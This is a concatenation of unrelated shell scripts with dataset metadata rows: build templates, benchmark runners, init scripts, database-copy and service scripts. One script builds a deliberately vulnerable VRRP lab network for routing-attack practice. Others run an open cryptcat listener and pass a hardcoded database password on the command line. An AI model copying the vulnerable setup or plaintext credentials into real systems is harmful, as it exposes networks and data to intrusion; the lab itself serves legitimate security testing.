sed -i -e "\$aif [ \"\$FW_PROTO\" == \"ipv6\" ]; then true" $configlet
sed -i -e "\$afi" $configlet
fi
fi
| true
|
58fa73118a44eb91cce2f28951852b6e2fac4f3f
|
Shell
|
devkitPro/pacman-packages
|
/switch/curl/PKGBUILD
|
UTF-8
| 1,378
| 2.515625
| 3
|
[] |
no_license
|
# Maintainer: WinterMute <davem@devkitpro.org>
# PKGBUILD for a static curl library cross-compiled for the Nintendo Switch
# (devkitPro/libnx toolchain).
pkgname=switch-curl
pkgver=7.69.1
pkgrel=5
pkgdesc='An URL retrieval utility and library'
arch=('any')
url='http://www.zlib.net/'
license=('zlib')
options=(!strip libtool staticlibs)
depends=('switch-zlib' 'libnx')
makedepends=('switch-pkg-config' 'dkp-toolchain-vars')
source=(
"https://curl.haxx.se/download/curl-${pkgver}.tar.xz"
'switch-curl.patch'
)
groups=('switch-portlibs')
sha256sums=(
'03c7d5e6697f7b7e40ada1b2256e565a555657398e6c1fcfa4cb251ccd819d4f'
'723c7d884fc7c39ae1a3115ba245bb8c1415da47bbd60ab8f943ca98f92ebc9a'
)
build() {
cd curl-$pkgver
patch -Np1 -i $srcdir/switch-curl.patch
# switchvars.sh sets PORTLIBS_PREFIX and the cross-compilation environment.
source /opt/devkitpro/switchvars.sh
LDFLAGS="-specs=${DEVKITPRO}/libnx/switch.specs ${LDFLAGS}"
./buildconf
# Static-only build; TLS is provided by libnx rather than a desktop library.
./configure --prefix=$PORTLIBS_PREFIX --host=aarch64-none-elf \
--disable-shared --enable-static --disable-ipv6 --disable-unix-sockets \
--disable-manual --disable-ntlm-wb --disable-threaded-resolver \
--without-ssl --without-polar-ssl --without-cyassl --without-wolfssl \
--without-mbedtls \
--with-libnx \
--with-default-ssl-backend=libnx
# Only the library is built; the curl CLI is not needed on-console.
make -C lib
}
package() {
cd curl-$pkgver
source /opt/devkitpro/switchvars.sh
make DESTDIR="$pkgdir" -C lib install
make DESTDIR="$pkgdir" -C include install
make DESTDIR="$pkgdir" install-binSCRIPTS install-pkgconfigDATA
}
| true
|
33890d0f22e8601aa8d9937434466ea07210a1c8
|
Shell
|
respeecher/benchmarks
|
/run_suite.sh
|
UTF-8
| 2,092
| 3.515625
| 4
|
[] |
no_license
|
#!/bin/bash
# Benchmark suite driver: runs super_burner.py (pytorch) workloads on GPU
# (if a device id is given as $2) and on CPU, appending output to $1.
# matmul SIZE ITER — square matrix multiply benchmark.
matmul () {
SIZE=$1
ITER=$2
echo -e "\n\nmatmul@${SIZE}:" | tee -a $LOGFILE
python super_burner.py --framework pytorch \
--task matmul \
--matrix-size $SIZE \
--iterations $ITER | tee -a $LOGFILE
}
# rnn SEQ ITER — vanilla RNN benchmark over a sequence of length SEQ.
rnn () {
SEQ=$1
ITER=$2
echo -e "\n\nrnn@seq=${SEQ}:" | tee -a $LOGFILE
python super_burner.py --framework pytorch \
--task rnn \
--input-size $SEQ \
--iterations $ITER | tee -a $LOGFILE
}
# conv2d INP KER ITER — 2-D convolution benchmark (input size x kernel size).
conv2d () {
INP=$1
KER=$2
ITER=$3
echo -e "\n\nconv2d@inp=${INP};ker=${KER}:" | tee -a $LOGFILE
python super_burner.py --framework pytorch \
--task conv2d \
--input-size-2d $INP \
--kernel-size $KER \
--iterations $ITER | tee -a $LOGFILE
}
# lstm SEQ ITER — LSTM benchmark over a sequence of length SEQ.
lstm () {
SEQ=$1
ITER=$2
echo -e "\n\nlstm@${SEQ}:" | tee -a $LOGFILE
python super_burner.py --framework pytorch \
--task lstm \
--input-size $SEQ \
--iterations $ITER | tee -a $LOGFILE
}
LOGFILE=$1
GPU_DEVICE=$2
if [ ! -z "$GPU_DEVICE" ]
then
echo "##### RUNNING TESTS ON GPU (DEVICE ${GPU_DEVICE}) #########"
export CUDA_VISIBLE_DEVICES=$GPU_DEVICE
matmul 128 20000
matmul 512 1000
matmul 2048 50
rnn 30 20000
rnn 300 20000
rnn 3000 20000
conv2d 30 3 7000
conv2d 100 10 500
conv2d 100 50 1000
lstm 300 10000
lstm 3000 10000
lstm 30000 2000
else
echo "WARNING: Skipping GPU tests. If you want to run GPU tests,
specify the GPU device id as a second argument to this script."
fi
echo "##### RUNNING TESTS ON CPU ################################"
# Empty CUDA_VISIBLE_DEVICES forces pytorch onto the CPU; note the CPU runs
# use far fewer iterations than the GPU runs above.
export CUDA_VISIBLE_DEVICES=
matmul 128 1500
matmul 512 100
matmul 2048 10
rnn 30 6000
rnn 300 3000
rnn 3000 500
conv2d 30 3 8000
conv2d 100 10 300
conv2d 100 50 40
lstm 300 1000
lstm 3000 500
lstm 30000 50
| true
|
547944229c237397967bdc4fe13cb5afd590a1ec
|
Shell
|
apache/bookkeeper
|
/bookkeeper-server/src/test/resources/networkmappingscript.sh
|
UTF-8
| 1,437
| 2.796875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
#
#/**
# * Copyright 2016 The Apache Software Foundation
# *
# * Licensed to the Apache Software Foundation (ASF) under one
# * or more contributor license agreements. See the NOTICE file
# * distributed with this work for additional information
# * regarding copyright ownership. The ASF licenses this file
# * to you under the Apache License, Version 2.0 (the
# * "License"); you may not use this file except in compliance
# * with the License. You may obtain a copy of the License at
# *
# * http://www.apache.org/licenses/LICENSE-2.0
# *
# * Unless required by applicable law or agreed to in writing, software
# * distributed under the License is distributed on an "AS IS" BASIS,
# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# * See the License for the specific language governing permissions and
# * limitations under the License.
# */
#
# This script is used as NetworkTopology Mapping Script in TestRackawareEnsemblePlacementPolicyUsingScript.java TestSuite
# It just maps HostAddress to rack depending on the last character of the HostAddress string
# for eg.
# 127.0.0.1 - /1
# 127.0.0.2 - /2
# 199.12.34.21 - /1
# This script file is used just for testing purpose
# rack 0 returns script error (non-zero error code)
for var in "$@"
do
# Index of the last character of the address string.
i=$((${#var}-1))
if [ "${var:$i:1}" == "0" ]; then
exit 1
fi
# Emit the rack name "/<last-char>" for this address.
echo /${var:$i:1}
done
| true
|
d89158c847cbe6189a48ce5a04a9885ee4b35a08
|
Shell
|
todo-assert/rootfs
|
/V3s/v3s_rootfs_other/etc/init.d/rcS
|
UTF-8
| 1,357
| 3.125
| 3
|
[] |
no_license
|
#!/bin/sh
# Boot-time rcS for an Allwinner V3s rootfs: export the DirectFB / tslib
# library and touchscreen environment, then run every /etc/init.d/S??* script.
export ZLIB_LIBS=/usr/local/dfb_suports/zlib/lib
export LIBPNG_LIBS=/usr/local/dfb_suports/libpng/lib
export LIBPNG_CFLAGS=/usr/local/dfb_suports/libpng/include
export LIBJPEG=/usr/local/dfb_suports/libjpeg/lib
export LIBJPEG_CFLAGS=/usr/local/dfb_suports/libjpeg/include
export FREETYPE_LIBS=/usr/local/dfb_suports/freetype/lib
export FREETYPE_CFLAGS=/usr/local/dfb_suports/freetype/include:/usr/local/dfb_suports/freetype/include/freetype2
export TSLIB_LIBS=/usr/local/dfb_suports/tslib/build/lib
export TSLIB_CFLAGS=/usr/local/dfb_suports/tslib/build/include
export PKG_CONFIG_PREFIX=/usr/local/dfb_suports/libpng/lib/pkgconfig:/usr/local/dfb_suports/freetype/lib/pkgconfig
export LD_LIBRARY_PATH=$ZLIB_LIBS:$LIBPNG_LIBS:$LIBJPEG:$FREETYPE_LIBS:$TSLIB_LIBS:/usr/local/dfb_suports/libdfb/lib
export PATH=$PATH:/usr/local/dfb_suports/libdfb/bin
# tslib touchscreen configuration: framebuffer output, event1 input device.
export TSLIB_CONSOLEDEVICE=none
export TSLIB_FBDEVICE=/dev/fb0
export TSLIB_TSDEVICE=/dev/input/event1
# Start all init scripts in /etc/init.d
# executing them in numerical order.
#
for i in /etc/init.d/S??* ;do
# Ignore dangling symlinks (if any).
[ ! -f "$i" ] && continue
case "$i" in
*.sh)
# Source shell script for speed.
(
trap - INT QUIT TSTP
set start
. $i
)
;;
*)
# No sh extension, so fork subprocess.
$i start
;;
esac
done
| true
|
5451db4217f8cc972707e1d1510510181ea9d8cc
|
Shell
|
openlibraryenvironment/mod-rs
|
/okapi-scripts/canRequest.sh
|
UTF-8
| 782
| 2.875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Query the mod-rs "canCreateRequest" endpoint for a patron via Okapi and
# print the JSON response.
# Set where this directory lives in relation to where it is being run from
SCRIPT_DIRECTORY=`dirname "$0"`
#echo Script directory: ${SCRIPT_DIRECTORY}
# setOkapiUrl sets the variable OKAPI_URL
. ${SCRIPT_DIRECTORY}/setOkapiUrl
#echo OKAPI URL: ${OKAPI_URL}
# Get hold of an auth token
AUTH_TOKEN=`${SCRIPT_DIRECTORY}/okapi-login`
#echo Auth Token: $AUTH_TOKEN
# Which tenant are we dealing with
TENANT="diku"
# The patron id
PATRON_ID="23033004447227"
#PATRON_ID="chas"
# -sSLf: quiet, show errors, follow redirects, fail on HTTP error status.
RESPONSE=$(curl --http1.1 -sSLf -H "x-okapi-token: $AUTH_TOKEN" -H 'accept: application/json' -H 'Content-type: application/json' \
-H "X-Okapi-Tenant: $TENANT" --connect-timeout 10 --max-time 30 -XGET "${OKAPI_URL}/rs/patron/${PATRON_ID}/canCreateRequest")
echo Request Response: $RESPONSE
| true
|
0fcf5be5d6bdc699a81fa0e8c04b19e2b026301b
|
Shell
|
atweiden/voidpkgs
|
/srcpkgs/tor/template
|
UTF-8
| 1,594
| 2.59375
| 3
|
[
"Unlicense",
"LicenseRef-scancode-unknown-license-reference",
"LicenseRef-scancode-public-domain"
] |
permissive
|
# Void Linux build template for tor (anonymizing overlay network).
maintainer="nox"
pkgname="tor"
version=0.4.7.14
revision=1
short_desc="Anonymizing overlay network"
depends+=" ca-certificates"
depends+=" torsocks"
makedepends+=" libcap-devel"
makedepends+=" libevent-devel"
makedepends+=" liblzma-devel"
makedepends+=" libscrypt-devel"
makedepends+=" libseccomp-devel"
makedepends+=" libzstd-devel"
makedepends+=" zlib-devel"
checkdepends+=" coccinelle"
checkdepends+=" python3"
hostmakedepends="pkg-config"
homepage="https://www.torproject.org/"
license="BSD-3-Clause"
changelog="https://gitlab.torproject.org/tpo/core/tor/-/raw/main/ChangeLog"
distfiles="https://dist.torproject.org/$pkgname-$version.tar.gz"
checksum="a5ac67f6466380fc05e8043d01c581e4e8a2b22fe09430013473e71065e65df8"
conf_files="/etc/tor/torrc"
build_style="gnu-configure"
configure_args="--enable-zstd"
case "$XBPS_TARGET_MACHINE" in
# tests just don't work here
x86_64-musl)
make_check="no"
;;
esac
make_dirs="/var/lib/tor 0700 tor tor"
system_accounts="tor"
tor_homedir="/var/lib/tor"
pre_configure() {
# ensure convenient config
# Append a User directive and enable syslog/DataDirectory defaults in the
# sample torrc before it is installed as /etc/tor/torrc.
printf '%s\n' \
"## On startup, setuid to this user and setgid to their primary group." \
"## Can not be changed while tor is running." \
"User tor" >> src/config/torrc.sample.in
vsed \
-i \
-e 's:#Log notice syslog:Log notice syslog:' \
-e "s:#DataDirectory :DataDirectory :" \
src/config/torrc.sample.in
}
post_install() {
# Ship the sample as the live config and install license, docs and runit service.
mv "$DESTDIR/etc/tor/torrc.sample" "$DESTDIR/etc/tor/torrc"
vlicense LICENSE
vdoc doc/torrc_format.txt
vsv tor
}
# vim: set filetype=sh foldmethod=marker foldlevel=0 nowrap:
| true
|
16597cdb7ec5da4833e125224e77149bd3a1b7a1
|
Shell
|
mathewHatch/Scripts
|
/Dictionary.bash
|
UTF-8
| 180
| 2.890625
| 3
|
[] |
no_license
|
#!/bin/bash
# Toggle a drop-down dictionary terminal: if sdcv is not running, launch it
# inside urxvt; otherwise kill the running instance.
RUN=$(exec ps au | grep -v "grep" | grep sdcv)
SDCV=$(exec pidof sdcv)
# BUGFIX: "$RUN" must be quoted — the ps output contains spaces, so the
# original unquoted [ -z $RUN ] was a test syntax error whenever sdcv was
# running, and the toggle-off branch never executed.
if [ -z "$RUN" ]
then
exec urxvt -title Dictionary_Drop_Down -e sdcv --color
else
# $SDCV intentionally unquoted: pidof may return several space-separated PIDs.
kill $SDCV
fi
| true
|
2b1d28a639c572ab759edfd6ae63ce5209e6940d
|
Shell
|
SkyN9ne/routopsy
|
/playground/FHRP/vulnerable_vrrp_network.sh
|
UTF-8
| 618
| 3.453125
| 3
|
[] |
no_license
|
#!/bin/bash
# Bring a deliberately vulnerable VRRP lab network up or down via
# docker-compose, wiring NAT and default routes inside the containers.
if [[ -z "$1" ]]; then
echo "Specify 'up' to create docker network and vrrp containers or"
echo "Specify 'down' to delete docker network and vrrp containers"
exit 1
fi
case $1 in
up)
docker-compose -f vulnerable_vrrp_network.yml up -d
# NAT outbound traffic on both VRRP routers.
docker exec -it vrrp_master iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
docker exec -it vrrp_slave iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
# Point the victim's default route at the VRRP virtual IP.
docker exec -it vrrp_victim route del -net 0.0.0.0/0
docker exec -it vrrp_victim route add -net 0.0.0.0/0 gw 172.13.37.254
;;
down)
docker-compose -f vulnerable_vrrp_network.yml down
esac
| true
|
815f2711a338e46e5336a6789d53f2739f06de26
|
Shell
|
MeterianHQ/meterian-github-action
|
/delete-release-from-github.sh
|
UTF-8
| 1,538
| 3.53125
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Delete the GitHub release (and its tag ref) matching the version recorded
# in version.txt, using the GitHub REST API v3.
set -e
set -u
set -o pipefail
CURRENT_DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
TARGET_REPO="MeterianHQ/meterian-github-action"
RELEASE_VERSION="$(cat ${CURRENT_DIR}/version.txt)"
TAG_NAME="v$(cat ${CURRENT_DIR}/version.txt)"
if [[ -z ${METERIAN_GITHUB_TOKEN} ]]; then
echo "METERIAN_GITHUB_TOKEN cannot be found in the current environment, please populate to proceed either in the startup bash script of your OS or in the environment variable settings of your CI/CD interface."
exit -1
fi
echo ""
echo "~~~~ Fetching Release ID for ${TAG_NAME}"
mkdir -p ${CURRENT_DIR}/artifacts
CURL_OUTPUT="${CURRENT_DIR}/artifacts/github-release.listing"
curl \
-H "Authorization: token ${METERIAN_GITHUB_TOKEN}" \
-H "Accept: application/vnd.github.v3+json" \
-X GET "https://api.github.com/repos/${TARGET_REPO}/releases/tags/${TAG_NAME}" |
tee ${CURL_OUTPUT}
# Parse the numeric release id from the first "id" field of the JSON listing.
# NOTE(review): this is grep/cut-based JSON parsing — fragile; jq would be safer.
RELEASE_ID=$(cat ${CURL_OUTPUT} | grep id | head -n 1 | tr -d " " | tr "," ":" | cut -d ":" -f 2)
echo ""
echo "~~~~ Deleting release with ID ${RELEASE_ID} linked to ${TAG_NAME}"
curl \
-H "Authorization: token ${METERIAN_GITHUB_TOKEN}" \
-H "Accept: application/vnd.github.v3+json" \
-X DELETE "https://api.github.com/repos/${TARGET_REPO}/releases/${RELEASE_ID}"
echo ""
echo "~~~~ Deleting reference refs/tags/${TAG_NAME}"
curl \
-H "Authorization: token ${METERIAN_GITHUB_TOKEN}" \
-H "Accept: application/vnd.github.v3+json" \
-X DELETE "https://api.github.com/repos/${TARGET_REPO}/git/refs/tags/${TAG_NAME}"
| true
|
a46c9b68712ff8675b82572aabfb88fecd1f78a2
|
Shell
|
mc-b/bigdata
|
/spark/spark
|
UTF-8
| 317
| 3.25
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
#
# Startet den Docker Container und dann das CLI
# (Starts the Docker container and then the CLI.)
#
export CONTAINER=spark01
export IMAGE=spark
export CMD=bash
# Remove any existing container with the same name before starting fresh.
b=`docker ps -a -q --filter "name=${CONTAINER}"`
if [ "${b}" != "" ]
then
docker stop ${b}
docker rm ${b}
fi
docker run -it --net=host --name ${CONTAINER} --entrypoint ${CMD} ${IMAGE}
| true
|
4511e5b0d910757b8c2400f90f156e4b6507101c
|
Shell
|
tankhuu/pipelines-as-code
|
/jenkins/scripts/bash/copy_db_site2site(1).sh
|
UTF-8
| 6,035
| 3.28125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Copy the "Athena" PostgreSQL database from one host to another:
# dump on the source, drop/recreate on the destination, restore, then
# re-apply ownership and privileges for the application user.
#
# Usage: copy_db_site2site.sh SRC_HOST SRC_PG_PW DST_HOST DST_PG_PW BK_DATE
src_db=$1
src_dbpw=$2
dst_db=$3
dst_dbpw=$4
bk_date=$5
db_name="Athena"
user="edulog"
bk_file=${db_name}.${bk_date}.bak

export PGPASSWORD=$src_dbpw
pg_dump -U postgres -h $src_db ${db_name} > $bk_file
if [ $? -gt 0 ]; then
  # BUGFIX: the original ran "exit 1" *before* the echo, so the failing
  # dump file name was never reported. Report first, then abort.
  echo $bk_file
  exit 1
fi
echo $dst_db
# (The original also echoed the destination password here; dropped — secrets
# must not be written to build logs.)
export PGPASSWORD=$dst_dbpw
echo "=> Drop Database on Dest"
# Take ownership, kick off connected sessions, then drop the database.
psql -U postgres -h $dst_db -c "ALTER DATABASE \"${db_name}\" OWNER TO postgres"
psql -U postgres -h $dst_db -c "SELECT pg_terminate_backend(pid) FROM pg_stat_activity WHERE datname = '${db_name}';"
psql -U postgres -h $dst_db -c "DROP DATABASE \"${db_name}\""
echo "=> Recreate Database on Dest"
psql -U postgres -h $dst_db -c "CREATE DATABASE \"${db_name}\";"
psql -U postgres -h $dst_db -c "CREATE EXTENSION postgis;" $db_name
ls -l
# BUGFIX: restore the dump we just took, not "*.bak" — the glob would also
# replay any stale backups lying in the working directory.
psql -U postgres -h $dst_db -d "${db_name}" -f "$bk_file"
# Update privileges for the application user on the database itself.
psql -U postgres -h $dst_db -c "ALTER DATABASE \"${db_name}\" OWNER TO ${user}"
psql -U postgres -h $dst_db -c "GRANT ALL PRIVILEGES ON DATABASE \"${db_name}\" to ${user}"
# Grant usage plus full table/sequence privileges on every application schema
# (same four statements the original repeated per schema, in the same order).
for schema in geo_master public settings edta rp_master ivin geo_plan rp_plan; do
  psql -U postgres -h $dst_db -d ${db_name} -c "GRANT USAGE ON SCHEMA ${schema} TO ${user}"
  psql -U postgres -h $dst_db -d ${db_name} -c "GRANT ALL PRIVILEGES ON SCHEMA ${schema} TO ${user}"
  psql -U postgres -h $dst_db -d ${db_name} -c "GRANT ALL PRIVILEGES ON ALL TABLES IN SCHEMA ${schema} TO ${user}"
  psql -U postgres -h $dst_db -d ${db_name} -c "GRANT ALL PRIVILEGES ON ALL SEQUENCES IN SCHEMA ${schema} TO ${user}"
done
# Transfer per-table ownership to the application user in each schema that
# the original script covered.
for schema in geo_plan geo_master public rp_master rp_plan settings; do
  for table in $(psql -U postgres -h $dst_db -tc "select tablename from pg_tables where schemaname = '${schema}';" ${db_name}); do
    psql -U postgres -h $dst_db -c "alter table ${schema}.${table} owner to ${user}" ${db_name}
  done
done
| true
|
0451e7448779a9204e2e2d98d30e4e5ec70eecf3
|
Shell
|
mehidou/INEUCE
|
/vagrant/shell/install-site.sh
|
UTF-8
| 245
| 3.078125
| 3
|
[] |
no_license
|
#!/bin/bash
# Provisioning hook: build the Drupal site with phing unless /vagrant/www
# already exists (i.e. the site was installed on a previous run).
export DRUSH_PHP="/usr/bin/php"
export PATH=$PATH:/vagrant/bin
if [[ ! -d /vagrant/www ]]; then
echo "Installing site ..."
cd /vagrant
phing build
echo "Site installed."
else
echo "Site already installed."
fi
| true
|
528cb53a0e5629c1e5e9f2cbbe30527eaecc3b59
|
Shell
|
hewei1983/fabric-chaincode-evm
|
/scripts/check_docker_deps.sh
|
UTF-8
| 629
| 2.5625
| 3
|
[
"Apache-2.0",
"CC-BY-4.0"
] |
permissive
|
#!/bin/bash
#
# Copyright IBM Corp All Rights Reserved.
# SPDX-License-Identifier: Apache-2.0
#
# Verify that the Docker images required for the build exist locally,
# failing with an error message when one is missing.
#
# BUGFIX: the original tested [ '$?' == '1' ] — the single quotes prevent
# expansion, so the literal string "$?" was compared with "1" and the error
# branch could never fire. Test the command's exit status directly instead.
if ! docker inspect hyperledger/fabric-buildenv:latest &>/dev/null; then
  # TODO: use below once fabric-buildenv images published
  # docker pull hyperledger/fabric-buildenv:latest
  echo "ERROR: hyperledger/fabric-buildenv:latest image required" && exit 1
fi
if ! docker inspect hyperledger/fabric-peer:latest &>/dev/null; then
  # TODO: use below once fabric 1.2 images published
  # docker pull hyperledger/fabric-peer:latest
  echo "ERROR: hyperledger/fabric-peer:latest image required" && exit 1
fi
| true
|
d2b4dc09ca63527b75e55f9c14f8aefcdf63f0e2
|
Shell
|
matthewbednarski/work-dotfiles
|
/sync-java-env
|
UTF-8
| 715
| 3.640625
| 4
|
[] |
no_license
|
#!/bin/bash
# For each JDK family directory under ~/java/*, find the highest versioned
# distribution (e.g. jdk-11.0.2) and (re)create an unversioned symlink
# (e.g. jdk) pointing at it.
declare -a dirs
declare -a dist
i=0
# Pass 1: collect each parent directory once (dirs[]) and the latest
# versioned entry seen for it (dist[]).
for x in ~/java/*/*-[0-9]*
do
dir=${x%\/*}
has_dir=0
j=0
for d in ${dirs[*]}
do
if [[ "$d" == "$dir" ]]; then
has_dir=1
echo has dir
# NOTE(review): these [[ < / > ]] comparisons are *lexicographic* string
# comparisons, not version-aware (e.g. "1.10" sorts before "1.9").
if [[ ${dist[$j]} > $x ]]; then
echo "${dist[$j]} > $x"
fi
if [[ ${dist[$j]} < $x ]]; then
echo "${dist[$j]} < $x"
dist[$j]=$x
echo "${dist[$j]}"
fi
fi
((j++))
done
if [[ $has_dir == 0 ]]; then
dirs[$i]=$dir
dist[$i]=$x
((i++))
fi
done
i=0
# Pass 2: inside each directory, replace the unversioned symlink (the dist
# path with its trailing "-<version>" stripped) with a link to the winner.
for x in ${dirs[*]}
do
# echo $x
cdold=$(pwd)
cd "$x"
t=${dist[$i]}
lnk=${t%-*}
# echo $lnk
if [[ -L $lnk ]];then
echo lnk exists
rm $lnk
fi
echo creating symlink $lnk
ln -s "${dist[$i]}" "$lnk"
cd "$cdold"
((i++))
done
| true
|
02281b13503cf20a616f29d1a5f4684192612230
|
Shell
|
illicitonion/binaries
|
/build-yarnpkg.sh
|
UTF-8
| 1,051
| 3.609375
| 4
|
[] |
no_license
|
#!/bin/bash -exuo pipefail
# Fetch a yarn release tarball and lay it out under build-support/bin/yarnpkg
# for linux and for the current macOS version, with symlinks for each older
# supported macOS version.
VERSION=${1:-"v1.2.0"}
CURRENT_MAC_VERSION="10.12"
ADDITIONAL_MAC_VERSIONS=(
10.6
10.7
10.8
10.9
10.10
10.11
)
ARCH_DIRECTORIES=(
linux/x86_64
mac/${CURRENT_MAC_VERSION}
)
wget https://github.com/yarnpkg/yarn/releases/download/${VERSION}/yarn-${VERSION}.tar.gz
mv yarn-${VERSION}.tar.gz yarnpkg-${VERSION}.tar.gz
# Copy the real tarball into each primary arch directory.
for arch_directory in ${ARCH_DIRECTORIES[@]}
do
echo "Copying tar for yarnpkg ${VERSION}, ${arch_directory}..."
full_dest_dir="build-support/bin/yarnpkg/${arch_directory}/${VERSION}"
mkdir -p ${full_dest_dir}
cp -f ./yarnpkg-${VERSION}.tar.gz ${full_dest_dir}/yarnpkg.tar.gz
done
# Older macOS versions get relative symlinks to the current-version tarball.
for additional_mac_version in "${ADDITIONAL_MAC_VERSIONS[@]}"
do
echo "Creating symlink for yarnpkg ${VERSION}, ${additional_mac_version}..."
full_symlink_dir="build-support/bin/yarnpkg/mac/${additional_mac_version}/${VERSION}"
mkdir -p ${full_symlink_dir}
ln -fs ../../${CURRENT_MAC_VERSION}/${VERSION}/yarnpkg.tar.gz ${full_symlink_dir}/yarnpkg.tar.gz
done
rm "yarnpkg-${VERSION}.tar.gz"
| true
|
472281f58a53398877ee86d5bdcfa9461764c56a
|
Shell
|
letees/Letees
|
/Raspberry Pi/piCAST/server.sh
|
UTF-8
| 1,266
| 3.6875
| 4
|
[
"LicenseRef-scancode-warranty-disclaimer"
] |
no_license
|
#!/bin/sh
############################################
# PiCAST Server/Listener
# ------------------------------------------
# Setup: chmod +x server.sh
# Start Command: sh /server.sh
############################################
########### Start PiCAST Networking ###########
# Pi IP/Port (Optional)
address="127.0.0.1"
port="8882"
########### End PiCAST Networking ###########
#echo "Reading Config File for Settings..."
# First line of con.cfg is the shared cryptcat password.
pass=$(awk "NR==1 {print;exit}" con.cfg)
echo "Welcome to PiCAST!"
echo "------------------"
# Prefer the wlan0 address; fall back to eth0 when wlan0 has no IP.
# BUGFIX: the original compared the unquoted value against the literal
# string "null" — ifconfig never prints "null", and when wlan0 had no
# address the empty unquoted expansion made the test itself error out.
theIP=`/sbin/ifconfig wlan0 | grep 'inet addr:' | cut -d: -f2 | awk '{ print $1}'`
if [ -z "$theIP" ]; then
theIP=`/sbin/ifconfig eth0 | grep 'inet addr:' | cut -d: -f2 | awk '{ print $1}'`
fi
echo "To CAST, please send requests to IP: " $theIP
echo "+===================================================+"
echo "Example: pic_ytvideo <URL/VIDEO> | cryptcat $theIP $port -k <pass>"
# Let's start the process of keeping me ALIVE!
while true
do
# We're going to use the pre-defined settings above, change as needed.
cryptcat -l -p $port -k $pass
done
| true
|
b29f3723ac25d16f3b34c0f3db645f39387bec60
|
Shell
|
vert-x3/vertx-mysql-postgresql-client
|
/vertx-mysql-postgresql-client-scala/src/test/resources/docker/start-postgres-ssl.sh
|
UTF-8
| 543
| 2.609375
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
# Start a throwaway PostgreSQL 9.4 container with SSL enabled, mounting the
# test certificate/key and an init script into docker-entrypoint-initdb.d.
export POSTGRES_DB=testdb
export POSTGRES_USER=vertx
export POSTGRES_PASSWORD=password
# Host port 54321 maps to the container's 5432.
docker run -d \
-e POSTGRES_USER \
-e POSTGRES_PASSWORD \
-e POSTGRES_DB \
--name "some-postgres-ssl" \
-v $(pwd)/src/test/resources/ssl-docker/server.crt:/docker-entrypoint-initdb.d/server.crt \
-v $(pwd)/src/test/resources/ssl-docker/server.key:/docker-entrypoint-initdb.d/server.key \
-v $(pwd)/src/test/resources/ssl-docker/init.sh:/docker-entrypoint-initdb.d/init.sh \
-p 54321:5432 \
"postgres:9.4.4"
| true
|
556020afffd46d42b2dd44299fc66668614de7f6
|
Shell
|
takshingchan/citm
|
/similarity/experiment-1
|
UTF-8
| 676
| 3.234375
| 3
|
[
"BSD-3-Clause"
] |
permissive
|
#!/bin/bash
#
# experiment-1
#
# This shell script calculates the distance between all 26 Bach
# motives and the two prototypes in Cambouropoulos (2001).
#
# Copyright (C) 2006 Tak-Shing Chan
#
# Running the experiment
mkdir -p results/cambouropoulos
# For each distance measure, write one line per motive j containing its
# distance to prototype 1 and to prototype 12.
for i in dist1 dist2 dist3; do
rm -f results/cambouropoulos/bach-$i
for ((j = 1; j <= 26; j++)); do
echo `../information/chan/ncf-ftd/$i \
opmfiles/cambouropoulos/$j.opm \
opmfiles/cambouropoulos/1.opm` \
`../information/chan/ncf-ftd/$i \
opmfiles/cambouropoulos/$j.opm \
opmfiles/cambouropoulos/12.opm` >> results/cambouropoulos/bach-$i
done
done
| true
|
799a4ebcdf37ad911df2fd816f31b23be0fc02c0
|
Shell
|
johnraff/google-translate
|
/devscripts/bump_version.sh
|
UTF-8
| 844
| 4.21875
| 4
|
[
"Unlicense"
] |
permissive
|
#!/bin/bash
# Script to bump the version and update the README.md & docs/*
# Last-Revision: 2016-12-09
#
# Usage: ./bump_version.sh <new-version>
FILES=`cat <<EOF
google_translate/version.py
README.md
docs/intro.rst
docs/conf.py
EOF`
# update_version OLD NEW FILE — replace every occurrence of OLD with NEW.
function update_version {
echo "Updating file: $3"
# BUGFIX: sed treats '.' as a regex wildcard, so "1.2.3" also matched
# strings like "1x2x3"; escape the dots in the old version. The file
# path is quoted to survive spaces.
sed -i "s/${1//./\\.}/$2/g" "$3"
}
if [ $# -ne 1 ]; then
echo "Usage: ./bump_version.sh <new-version>"
exit 1
fi
cd ..
new_version=$1
cur_version=$(grep "version" "google_translate/version.py" | cut -d " " -f 3 | tr -d "'")
echo "Current version = $cur_version"
echo "New version = $new_version"
echo
for file in $FILES; do
update_version $cur_version $new_version $file
done
cd "devscripts"
read -p "Rebuild HTML docs? (y/n) " choice
if [[ $choice == 'y' || $choice == 'Y' ]]; then
./build_html_docs.sh
fi
echo "Done"
exit 0
| true
|
a48ffb8e3fc7aac216459ded53b70e1c2c53c1d4
|
Shell
|
sebaofshanxi/MathEquInspect
|
/etc/mathinspect_svc.sh
|
UTF-8
| 1,477
| 3.765625
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Service control script for the mathinspect Spring Boot application:
# start|stop|restart via `pkill -0` process checks and the actuator
# /shutdown endpoint.
export APP_HOME=/opt/mathinspect
export APP_NAME=mathinspect
export APP_PORT=9001
# BUGFIX: this banner originally ran before APP_NAME was assigned, so it
# always printed "Service [] - ...". Print it after the exports instead.
echo "Service [$APP_NAME] - [$1]"
echo " JAVA_HOME=$JAVA_HOME"
echo " APP_HOME=$APP_HOME"
echo " APP_NAME=$APP_NAME"
echo " APP_PORT=$APP_PORT"
# Launch the app in the background as user "sboot"; pkill -0 -f is used as
# an "is it running?" probe.
function start {
  if pkill -0 -f $APP_NAME.war > /dev/null 2>&1
  then
    echo "Service [$APP_NAME] is already running. Ignoring startup request."
    exit 1
  fi
  echo "Starting application..."
  nohup sudo -u sboot java -jar $APP_HOME/$APP_NAME.war --spring.datasource.password=xiwang --inspection.image.server=http://72.93.93.60/formula_images/ --server.port=$APP_PORT < /dev/null > /dev/null 2>&1 &
}
function stop {
  if ! pkill -0 -f $APP_NAME.war > /dev/null 2>&1
  then
    echo "Service [$APP_NAME] is not running. Ignoring shutdown request."
    exit 1
  fi
  # First, we will try to trigger a controlled shutdown using
  # spring-boot-actuator
